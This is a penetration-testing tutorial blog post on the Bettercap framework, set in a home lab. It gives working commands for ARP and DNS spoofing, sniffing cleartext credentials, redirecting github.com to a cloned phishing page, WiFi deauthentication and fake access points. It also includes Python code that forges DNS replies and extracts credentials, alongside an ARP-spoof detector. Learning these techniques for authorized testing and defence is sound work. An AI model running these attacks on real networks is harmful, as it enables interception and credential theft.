Bettercap Tutorial & Top Commands (2024 Update)

Are you wondering how to use Bettercap and why it’s essential for your toolkit?

Bettercap is a versatile network attack and reconnaissance framework, best known for making man-in-the-middle attacks quick to set up.

In this Bettercap tutorial, we’ll explain what Bettercap is, briefly discuss ARP spoofing and man-in-the-middle attacks, and show you its most used features so you can utilize the tool effectively.

We’ll walk you through setting it up and then show you some of its functionalities, including ARP and DNS spoofing, port scanning, finding cleartext credentials when insecure protocols are used, and WiFi hacking.

If you’re ready to dive into our Bettercap cheat sheet, let’s begin.

What Is Bettercap?

Bettercap, a portable framework written in Go, is often described as a Swiss army knife because of how much it covers: network reconnaissance, WiFi attacks, and scanning of Bluetooth Low Energy devices and Ethernet networks.

It’s a tool used by many in cyber security, including penetration testers, reverse engineers, and security researchers, to perform MitM (Man-in-the-Middle) attacks, also known as on-path attacks.

Bettercap builds on the ideas of classic tools like Ettercap and packages the features you need to analyze networks and devices into a modern suite for wired and wireless attacks.

Some of its features include:

  • IP host discovery and reconnaissance
  • Network spoofing attacks via ARP, DNS, NDP, DHCPv6 poisoning
  • Port scanning
  • WiFi network scanning and attacks like de-authentication and WPA/WPA2 handshake capturing

Bettercap can be installed on Windows, Linux, macOS, and Android.

ARP Spoofing and MitM Attacks

One of the many features of Bettercap is its ability to perform ARP spoofing, sometimes referred to as ARP poisoning, which we’ll demonstrate later. For now, let’s discuss what it is and how it works.

Devices on the same subnet exchange frames using MAC addresses at the data link layer of the OSI Reference Model. ARP is how a host learns which MAC address belongs to an IP address, and the answers are cached in the host's ARP table.

ARP has no authentication, so a host cannot tell a legitimate reply from a forged one. If no preventive measures (such as dynamic ARP inspection on the switch or static ARP entries) are in place, anyone on the same subnet can rewrite a host's ARP table by sending spoofed ARP replies that map another device's IP address, typically the gateway's, to the attacker's MAC address. The host then sends that traffic to the attacker.

This puts the attacker on the path between the two devices, able to eavesdrop on and intercept sensitive communications, modify data in transit, or impersonate devices to gain unauthorized access to systems and services.

For a more detailed look at this process, see How to Perform an ARP Poisoning Attack: A Step-by-Step Guide.

Preparing to Follow Along With Our Bettercap Tutorial

If you’d like to follow along with our tutorial, you’ll need to set up a hacking lab with a hacking machine like Kali or Parrot OS and at least one other virtual machine.

See How to Create a Virtual Hacking Lab: The Ultimate Hacker Setup if you need help setting up your lab.

For the demo below, we’ll show you how to use Bettercap commands to perform a couple of on-path attacks (ARP and DNS spoofing), but before we get started, let’s show you how to install it.

Bettercap is only intended for authorized network testing and educational purposes. Usage against networks without explicit permission is illegal. Users take full responsibility for any unauthorized use of this tool. Details are included in our article, “Is Hacking Illegal? The Law and Ethical Perspectives.”

Bettercap Installation

Bettercap can be installed in several ways, such as via Docker, precompiled binaries, or compiled from source.

We’ll use Kali Linux for our demo, and Bettercap is available in the Kali rolling repositories for easy installation.

To conveniently set up Bettercap with all the necessary dependencies on the most recent Kali release, you can run the following:

sudo apt update 

sudo apt install bettercap

Install Bettercap

If you are installing it on Docker, compiling from source, compiling on Android, or deploying on other Linux distributions (like Ubuntu or Fedora based ones), visit the Installation Page on the official website.

Starting Bettercap

You can run Bettercap via a web UI, interactive session, or scripting. We’ll be running our demo via the interactive session mode. But we’ll quickly show how to start Bettercap as a web interface.

To start the web UI, enter: sudo bettercap -caplet http-ui 

Start Bettercap Web UI

As you can see from the screenshot above, the http.server module is listening at http://127.0.0.1. Open this in your browser, and you’ll see the login screen.

Bettercap Login page

The default Bettercap username is user, and the default password is pass.

These values come from the api.rest.username and api.rest.password lines in the http-ui caplet. Change them there before you use the web UI, and certainly before binding it to anything other than 127.0.0.1:

/usr/share/bettercap/caplets/http-ui.cap

Bettercap http-ui.cap

Once you’ve logged in, you’ll see the web dashboard.

Bettercap Web Dashboard

To start Bettercap in interactive session mode on the default interface (ours is eth0), simply enter sudo bettercap in the terminal.

Start Bettercap

If you want to bind to another interface, specify it with the -iface flag, for example sudo bettercap -iface <interface>.

Bettercap Commands and Modules

Bettercap's functionality lives in modules. Each module provides one kind of capability, and the modules are grouped by the type of functionality they provide.

These modules can be loaded and used during a Bettercap session and include:

  • Various modules: Essential for the framework's operation, such as events, UI, and API
  • Bluetooth LE: Modules for Bluetooth Low Energy devices scanning, reconnaissance and attacks
  • WiFi: Modules relating to WiFi networks, access points, client attacks, etc.
  • HID on 2.4 GHz: MouseJacking and wireless HID attacks
  • IPv4/IPv6: Network host/topology discovery, sniffing, spoofing IPv4/v6 networks
  • Proxies: man-in-the-middle proxy modules
  • Servers: modules to create various simple servers
  • Utils: miscellaneous utility modules providing additional functionality

To see a list of available commands and modules, you can enter help.

Bettercap Help
Bettercap Modules

If you need a detailed module explanation, including its parameters, enter help <module>.

For example, let’s look at the info for the net.probe module.

Help net.probe

To see details on currently running modules at any time, use the active command.

Bettercap Active Modules

In the following sections, we’ll walk you through some of the Man-in-the-Middle attacks we can perform with Bettercap.

Bettercap Host Discovery

Once inside the network, our priority is mapping live hosts before we can perform any other actions.

The first step is to use the net.probe module to probe for hosts on the network. Bettercap does this by sending probe packets to every IP in the subnet (dummy UDP packets plus mDNS, NBNS, UPnP and WSD queries) so that live hosts reveal themselves. We can start probing with the net.probe on command.

Tip: Modules can be turned on and off with the command module on/off.

Bettercap net.probe

Bettercap will continue to look for any new hosts that come online until you turn off net.probe.

To see all the hosts found by the probe, you can use the command net.show. It will display all hosts, the gateway, and our machine (eth0) in a table.

Bettercap net.show

The module has discovered three devices on the network with IP addresses ending in 133, 134, and 135. At this point, we could leverage additional tools like Nmap to explore and validate these hosts further.

Choosing a Target to Spoof

For our demo, we’ll choose the Windows 10 machine as our target (192.168.37.133).

We’ll poison the Windows machine's ARP table to intercept its traffic. Bettercap answers ARP for the gateway's IP address with our own MAC address, so the target sends packets destined for the gateway to our machine instead. Bettercap also turns on IP forwarding so that we relay those packets and the victim keeps its connectivity.

This positions us between the Windows device and the gateway, where we can sniff its outbound communications.

First, let's take a look at the current ARP table on the Windows host.

Windows ARP Table

As you can see from above, the MAC addresses of our attacking machine at 192.168.37.128 and the gateway at 192.168.37.2 are different.

To begin the spoofing, we need to tell Bettercap which device’s ARP table we want to poison. As we are poisoning the Windows machine, we set it as the target and then start the module:

set arp.spoof.targets 192.168.37.133

arp.spoof on

Bettercap arp.spoof

Now, when we check the ARP table on the Windows machine, the gateway entry (192.168.37.2) shows our attacking machine's MAC address.

Windows Spoofed ARP Table

The spoofing attack has worked. Two IP addresses sharing one MAC in the ARP table is exactly the tell a defender looks for, and a static ARP entry for the gateway on the client, or dynamic ARP inspection on the switch, would have blocked it.

The arp.spoof.targets parameter defaults to the entire subnet, so if you do not set it before running arp.spoof on, Bettercap will poison every host it has discovered.

By default, only connections between the targets and the external network are spoofed, and only the targets are poisoned: the gateway's replies still travel directly to the victim, so you see one direction of the traffic. Set arp.spoof.fullduplex to true to poison the gateway as well and capture both directions, and set arp.spoof.internal to true if you also want to spoof traffic among devices on the local network.
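The duplicate-MAC tell in the two ARP tables above is easy to check for programmatically. The following is an added example, not from the tutorial or from Bettercap, that parses arp -a style output, flags any MAC address claiming more than one IP, and compares the gateway's MAC against a recorded baseline. The sample tables mirror the lab addresses used above; the MAC addresses in them are made up.

```python
"""Spot ARP spoofing from a host's ARP table: one MAC answering for two IPs.

Added example, not part of the tutorial or Bettercap. The tables below are
constructed to look like `arp -a` output on the tutorial's Windows target
(192.168.37.133); the MAC addresses are made up.
"""
import ipaddress
import re
from collections import defaultdict

# Before the attack: the gateway (.2) and the attacker (.128) have distinct MACs.
ARP_TABLE_BEFORE = """\
Interface: 192.168.37.133 --- 0x5
  Internet Address      Physical Address      Type
  192.168.37.2          00-50-56-e1-aa-bb     dynamic
  192.168.37.128        00-0c-29-11-22-33     dynamic
  192.168.37.255        ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# After `arp.spoof on`: the gateway entry now carries the attacker's MAC.
ARP_TABLE_AFTER = ARP_TABLE_BEFORE.replace("00-50-56-e1-aa-bb", "00-0c-29-11-22-33")

# One table row: an IPv4 address, then a MAC in 00-11-.. (Windows) or 00:11:.. (Linux) form.
ENTRY_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\b"
)


def parse_arp_table(text):
    """Return {ip: mac} for unicast entries, MACs normalised to aa:bb:cc:dd:ee:ff."""
    entries = {}
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        ip, mac = m.group(1), m.group(2).lower().replace("-", ":")
        # Broadcast and multicast rows legitimately share group addresses; skip them.
        if mac == "ff:ff:ff:ff:ff:ff" or ipaddress.ip_address(ip).is_multicast:
            continue
        entries[ip] = mac
    return entries


def find_duplicate_macs(entries):
    """Return {mac: [ips]} for every MAC that claims more than one IP address."""
    by_mac = defaultdict(list)
    for ip, mac in entries.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_mac_ok(entries, gateway_ip, known_good_mac):
    """True if the gateway still resolves to the MAC recorded in a trusted baseline."""
    return entries.get(gateway_ip) == known_good_mac.lower().replace("-", ":")


if __name__ == "__main__":
    for label, table in (("before", ARP_TABLE_BEFORE), ("after", ARP_TABLE_AFTER)):
        entries = parse_arp_table(table)
        status = "gateway ok" if gateway_mac_ok(entries, "192.168.37.2", "00-50-56-e1-aa-bb") else "GATEWAY MAC CHANGED"
        print(label, find_duplicate_macs(entries) or "no shared MACs", status)
```

The baseline comparison is the stronger check: a shared MAC only shows up if the attacker's own entry happens to be in the table, whereas a recorded gateway MAC catches the change on its own. Tools such as arpwatch do the same thing continuously from sniffed ARP traffic rather than from a one-off table dump.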

Capturing Data With Bettercap

Now that we’ve spoofed the ARP table of the Windows machine, we can start capturing data flowing between it and the gateway.

To begin the sniffing process, we need to set net.sniff to on with the net.sniff on command.

Bettercap net.sniff

If you’d like to save the captured packets to a pcap file for further analysis, use the set net.sniff.output filename.pcap before turning on the net.sniff module.

Tip: Bettercap allows you to use tab completion for commands. Simply start typing a command and then hit tab to see possible options and quickly autocomplete.

We’ll be able to capture all sorts of traffic, such as DNS, NetBIOS Name Service (NBNS), FTP, and more.

For example, if someone from the Windows machine logs in to an FTP server without using secure protocols, we can see the clear text credentials.

Bettercap FTP Credentials

Capturing Web Traffic With Bettercap

Sniffing the traffic also allows us to see all web traffic by the Windows machine. This can give us insight into the user's online activities, expose sensitive information they transmit or request, and potentially harvest login credentials if they visit sites using cleartext HTTP.

If someone visits an unsecured site and enters any credentials, we can capture these and use them for other services or applications.

Bettercap HTTP Credentials
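Here is an added example, not part of the tutorial or of Bettercap's own sniffer, showing what the protocol parsers behind the FTP and HTTP screenshots above have to do: pair USER and PASS on an FTP control channel, decode an HTTP Basic Authorization header, and pull login fields out of a form POST. The FTP session and HTTP requests are constructed sample payloads, not captured traffic.

```python
"""Extract cleartext credentials from captured FTP and HTTP payloads.

Added example modelled on what a sniffer's protocol parsers do; the payloads
below are constructed for the demo, not captured traffic.
"""
import base64
from urllib.parse import parse_qs

# Constructed FTP control-channel exchange; 'C:' lines are the client, 'S:' the server.
FTP_SESSION = [
    "S: 220 (vsFTPd 3.0.3)",
    "C: USER alice",
    "S: 331 Please specify the password.",
    "C: PASS S3cret!",
    "S: 230 Login successful.",
]

# Constructed HTTP request carrying a Basic Authorization header (bob:hunter2).
HTTP_BASIC = (
    "GET /admin HTTP/1.1\r\n"
    "Host: intranet.example\r\n"
    "Authorization: Basic Ym9iOmh1bnRlcjI=\r\n"
    "\r\n"
)

# Constructed login form POST over plain HTTP.
HTTP_FORM = (
    "POST /login HTTP/1.1\r\n"
    "Host: shop.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 36\r\n"
    "\r\n"
    "username=carol&password=pa%24%24w0rd"
)

# Form field names that usually carry a login or a password.
CRED_FIELDS = {"user", "username", "login", "email", "pass", "password", "passwd", "pwd"}


def ftp_credentials(lines):
    """Pair each client USER command with the PASS that follows it."""
    creds, user = [], None
    for line in lines:
        if not line.startswith("C: "):
            continue                      # only client commands carry credentials
        cmd, _, arg = line[3:].partition(" ")
        if cmd.upper() == "USER":
            user = arg
        elif cmd.upper() == "PASS" and user is not None:
            creds.append({"proto": "ftp", "user": user, "pass": arg})
            user = None
    return creds


def http_credentials(raw):
    """Return Basic-auth and form-field credentials found in one raw HTTP request."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    _method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = f"http://{headers.get('host', '?')}{path}"
    found = []

    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            decoded = base64.b64decode(auth[6:], validate=True).decode("utf-8", "replace")
        except ValueError:                # malformed base64 (binascii.Error is a ValueError)
            decoded = ""
        if ":" in decoded:
            user, _, pwd = decoded.partition(":")
            found.append({"proto": "http-basic", "url": url, "user": user, "pass": pwd})

    ctype = headers.get("content-type", "").lower()
    if body and ctype.startswith("application/x-www-form-urlencoded"):
        fields = {k.lower(): v[0] for k, v in parse_qs(body).items()}
        hits = {k: v for k, v in fields.items() if k in CRED_FIELDS}
        if hits:
            found.append({"proto": "http-form", "url": url, **hits})
    return found


if __name__ == "__main__":
    for cred in ftp_credentials(FTP_SESSION) + http_credentials(HTTP_BASIC) + http_credentials(HTTP_FORM):
        print(cred)
```

Note that none of this needs to break any cryptography: Basic auth is only base64, and a form POST over HTTP is plain text. The same parsers see nothing once the service moves to FTPS/SFTP or HTTPS, which is why cleartext protocols on an internal network are a finding in their own right.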

As the screenshot below shows, the user has also visited GitHub. Let's make a note of this for the DNS spoofing attack to come.

Bettercap Sniffed Traffic

DNS Spoofing With Bettercap

DNS spoofing lets us answer a victim's DNS queries for chosen domains with an IP address we control, so their browser connects to our server instead of the real one. Sitting between the traffic gives us the power to redirect, monitor, and potentially manipulate the exchange, which can be used for phishing, credential harvesting, or spreading malware.

The first step is to create a malicious site where we can send the user. You can use the site cloner option inside the Social Engineer Toolkit.

We have an article that will walk you through creating the site; see Unlock SET: How to Use The Social Engineer Toolkit Effectively.

Next, we must let Bettercap know which domain we want to spoof. Remember from earlier; we saw a user visiting GitHub.

Let’s use that information to our advantage. Anytime someone attempts to resolve github.com, we’ll answer with our own address, send them to our cloned site, and collect their credentials.

To do this, we use the command set dns.spoof.domains github.com, and then to start the spoofing, we use dns.spoof on. By default, spoofed names resolve to our own interface address (the dns.spoof.address parameter), which is where SET is serving the clone; set it explicitly if the clone is hosted elsewhere.

Bettercap dns.spoof

When users look up github.com, the forged answer returns our address and they land on our cloned site. One caveat for real-world use: github.com is served only over HTTPS with HSTS, so a browser that already knows the site will refuse to load a plain-HTTP clone and will show a certificate error for an HTTPS one. For a lab demo, pick a site the victim reaches over plain HTTP.

Cloned Github Page

If the user enters any credentials, they’ll be captured in the social engineer toolkit.

Creds in SET
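To see what dns.spoof does on the wire, here is an added example (not Bettercap's code) that parses a victim's DNS query, checks the name against a spoof list that accepts exact names and the *.domain wildcard form, and forges an A-record answer pointing at 192.168.37.128, the attacking machine from this lab, copying the query's transaction ID so the resolver accepts it. Nothing is sent; the bytes are built and verified locally.

```python
"""Forge the DNS answer a dns.spoof-style module sends for a chosen domain.

Added example, not Bettercap's code: it parses a query off the wire, decides
whether the name is in the spoof list (exact name or *.wildcard), and builds an
A-record response that copies the query's transaction ID. Nothing is sent.
"""
import struct

A_RECORD, IN_CLASS = 1, 1


def encode_name(name):
    """Wire-format a name: github.com becomes <6>github<3>com<0>."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.strip(".").split("."))
    return out + b"\x00"


def decode_name(msg, offset):
    """Decode a possibly compressed name; return (name, offset just past it)."""
    labels, end, jumped = [], None, False
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                          # compression pointer
            if not jumped:
                end = offset + 2
            offset = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            jumped = True
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if jumped else offset)


def build_query(txid, qname, qtype=A_RECORD):
    """A standard recursive query (RD=1) with one question, as a stub resolver sends."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", qtype, IN_CLASS)


def parse_query(msg):
    """Return (txid, qname, qtype, end_of_question) for a one-question query, else None."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    if flags & 0x8000 or qdcount != 1 or ancount != 0:    # responses are never spoofed
        return None
    qname, off = decode_name(msg, 12)
    qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
    return txid, qname.lower(), qtype, off + 4


def matches(spoofed, qname):
    """Exact match, or a '*.example.com' wildcard covering the apex and every subdomain."""
    for pattern in (p.lower() for p in spoofed):
        if pattern.startswith("*."):
            if qname == pattern[2:] or qname.endswith(pattern[1:]):
                return True
        elif qname == pattern:
            return True
    return False


def forge_reply(query, spoofed, answer_ip, ttl=300):
    """Return forged response bytes for a matching A query, or None to let it pass."""
    parsed = parse_query(query)
    if parsed is None:
        return None
    txid, qname, qtype, qend = parsed
    if qtype != A_RECORD or not matches(spoofed, qname):
        return None
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR=1 RD=1 RA=1, one answer
    question = query[12:qend]                                   # echo the question verbatim
    rdata = bytes(int(octet) for octet in answer_ip.split("."))
    # Answer: pointer to the name at offset 12, type A, class IN, TTL, RDLENGTH 4, the IP.
    answer = struct.pack("!HHHIH", 0xC000 | 12, A_RECORD, IN_CLASS, ttl, 4) + rdata
    return header + question + answer


def parse_answer(msg):
    """Return (txid, qname, ip) from a single-answer A response (used to verify the forgery)."""
    txid = struct.unpack("!H", msg[:2])[0]
    qname, off = decode_name(msg, 12)
    off += 4                                                     # skip QTYPE/QCLASS
    _, off = decode_name(msg, off)                               # answer owner name (pointer)
    _rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
    off += 10
    return txid, qname, ".".join(str(b) for b in msg[off:off + rdlen])


if __name__ == "__main__":
    # 192.168.37.128 is the attacking machine in the tutorial's lab.
    query = build_query(0x1234, "github.com")
    reply = forge_reply(query, ["github.com", "*.github.com"], "192.168.37.128")
    print(parse_answer(reply))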

Bettercap Caplets

Caplets are script files containing a list of Bettercap commands that are executed in order, which lets you automate tasks.

Rather than manually entering Bettercap commands individually, you can use caplets to bundle together tailored workflows.

Bettercap comes preloaded with caplets, which you can list using the caplets.show command.

Bettercap Caplets

Bettercap loads caplets from several paths and uses /usr/share/bettercap/caplets as its default.

You can add your own caplet directories by setting the CAPSPATH environment variable to the paths you want searched.

To see the paths currently in use, enter caplets.paths.

Bettercap Caplets Path

We can create a caplet to perform the same tasks we performed in the tutorial.

To create a caplet, simply open any text editor and enter the commands you want to perform, ensuring they are in the order you want completed.

Let's create a caplet to start probing for hosts, set a spoofing target, and then begin sniffing traffic.

Bettercap Create Caplet

# test.cap: discover hosts, poison the Windows target, then sniff its traffic
net.probe on
set arp.spoof.targets 192.168.37.133
arp.spoof on
net.sniff on

Save this file to one of the caplet paths, ensuring you use the .cap extension (we saved ours as test.cap).

We need to pass the caplet to Bettercap when we start it. Enter the following in the terminal:

sudo bettercap -caplet test.cap

Bettercap Use Caplet

Bettercap Port Scanning

Bettercap is also a very fast port scanner. Although less robust than dedicated scanners like Nmap and RustScan, it lets you run a SYN scan against any targets you located during host discovery, and it will attempt to grab banners from the open ports it finds.

To run a port scan, use the command syn.scan <IP Range> <Start Port> <End Port>. The port arguments are optional; leave them out to scan the full range.

Here’s an example of a port scan against host 192.168.37.135 looking for open ports between 20 and 500.

syn.scan 192.168.37.135 20 500

Bettercap Port Scan

Bettercap WiFi Attacks

Another useful feature of Bettercap is wireless reconnaissance and attacks.

For example, it can send de-authentication or disassociation frames to force clients to reconnect, letting you capture the WPA/WPA2 four-way handshake for offline cracking, and it can broadcast beacons for a rogue access point to lure devices.

We’ll show you a brief example of its capabilities.

You’ll need a compatible WiFi adapter with monitor and injection modes enabled to perform these attacks. Ensure that the adapter is set up and ready to be used. You can read How to Hack WiFi With Kali Linux Like a Pro for more information.

Use the following commands to start Bettercap on your WiFi interface and begin scanning for networks. You can hand Bettercap the interface in managed mode (wlan0, or wlan0mon if you already switched the adapter to monitor mode with airmon-ng); wifi.recon puts it into monitor mode and starts channel hopping itself.

sudo bettercap -iface wlan0

wifi.recon on

Bettercap Wifi Hacking

To see a list of all discovered access points, use the command wifi.show, which will display a table of found SSIDs with the corresponding BSSID, encryption type, WPS version, the number of connected clients, and data sent and received.

Bettercap wifi.show

From here, you could run wifi.deauth <BSSID> against an access point to kick its clients off, then wait for them to reconnect while wifi.recon captures the handshake to the pcap file named by wifi.handshakes.file, which you take offline to crack.

Bettercap also makes it easy to create fake access points with just a few quick commands.

set wifi.ap.ssid <SSID>

set wifi.ap.bssid <BSSID>

set wifi.ap.channel <Channel>

set wifi.ap.encryption false

wifi.recon on; wifi.ap

Bettercap - create fake access point

The fake access point's beacons will be broadcast, so it shows up in nearby devices' network lists. Note that wifi.ap only injects beacon frames; it does not run a functioning access point, so it is useful for SSID spoofing and lures rather than for serving clients.

Fake Access Point

Conclusion

After reading this guide, you should better understand how to use Bettercap.

This powerful and versatile tool can help you conduct network reconnaissance and analysis during red team or security research engagements.

Throughout our tutorial, we walked you through installing Bettercap, discussed its flexibility via built-in modules, and explored techniques like ARP spoofing, traffic sniffing, and DNS spoofing with practical examples.

Are you looking to dive deeper into network recon or penetration testing? Then, join the StationX Community for courses on these topics and take advantage of our many benefits, including mentorship, career guidance, and more.

  • Richard Dezso

    Richard is a cyber security enthusiast, eJPT, and ICCA who loves discovering new topics and never stops learning. In his home lab, he's always working on sharpening his offensive cyber security skills. He shares helpful advice through easy-to-understand blog posts that offer practical support for everyone. Additionally, Richard is dedicated to raising awareness for mental health. You can find Richard on LinkedIn, or to see his other projects, visit his Linktree.
